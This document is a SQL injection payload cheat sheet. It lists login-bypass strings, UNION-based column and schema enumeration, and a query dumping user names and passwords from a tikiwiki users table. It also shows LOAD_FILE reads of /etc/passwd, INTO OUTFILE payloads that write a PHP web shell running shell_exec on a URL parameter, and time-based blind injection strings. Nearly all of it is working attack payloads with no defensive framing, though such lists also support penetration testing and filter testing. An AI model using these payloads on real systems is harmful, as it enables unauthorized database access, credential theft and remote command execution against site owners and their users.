
-- SQL Injection Payload List --

'
''
`
``
,
"
""
/
//
\
\\
;
' or "
-- or # 
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -
' OR '' = '
'0' OR '0'='0';
'='
'LIKE'
'=0--+
 OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2
%00
/*…*/ 
+		addition, concatenate (or space in url)
||		(double pipe) concatenate
%		wildcard attribute indicator

@variable	local variable
@@variable	global variable


# Numeric
AND 1
AND 0
AND true
AND false
1-false
1-true
1*56
-2


1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+

1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1	

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

0' or 1=1 UNION SELECT null, version() #
0' or 1=1 UNION SELECT user(), database() #

0' or 0=0 UNION SELECT table_schema, table_name from information_schema.tables #
0' or 0=0 UNION SELECT 1,concat(table_name,char(58),column_name) from information_schema.columns #
0' or 0=0 UNION SELECT user, password from tikiwiki195.tiki_users #


Retrieve information about the database, SQL server and tables:

• @@hostname : Current Hostname
• @@tmpdir : Tept Directory
• @@datadir : Data Directory
• @@version : Version of DB
• @@basedir : Base Directory
• user() : Current User
• database() : Current Database
• version() : Version
• schema() : current Database
• UUID() : System UUID key
• current_user() : Current User


Reading local files with the LOAD_FILE function:

SELECT * LOAD_FILE('/home/username/mytextfile.txt');
0' UNION SELECT 1, load_file('/etc/passwd') #


Writing files with the OUTFILE function:

SELECT * [fields] INTO OUTFILE '/tmp/output.txt';
0' UNION SELECT '<?php phpinfo();?>', null INTO OUTFILE '/var/www/info.php' #
0' UNION SELECT '<?php echo shell_exec($_GET[\'cmd\']); ?>', null INTO OUTFILE '/var/www/cmd.php' #
0' UNION SELECT 1, load_file('/etc/apparmor.d/usr.sbin.mysqld') #




Finding the table name

Time-Based:
,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Comments:

#	    Hash comment
/*  	C-style comment
-- -	SQL comment
;%00	Nullbyte
`	    Backtick

